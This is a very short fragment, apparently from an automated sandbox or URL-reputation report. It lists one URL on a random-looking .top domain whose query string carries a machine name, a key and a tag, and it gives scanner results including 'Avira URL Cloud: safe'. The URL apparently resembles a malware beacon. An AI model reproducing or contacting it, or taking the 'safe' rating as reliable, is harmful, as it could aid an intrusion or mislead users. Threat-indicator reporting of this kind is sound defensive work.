http://mknjddllgakhaje.top/oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1 false
  • Avira URL Cloud: safe
 unknown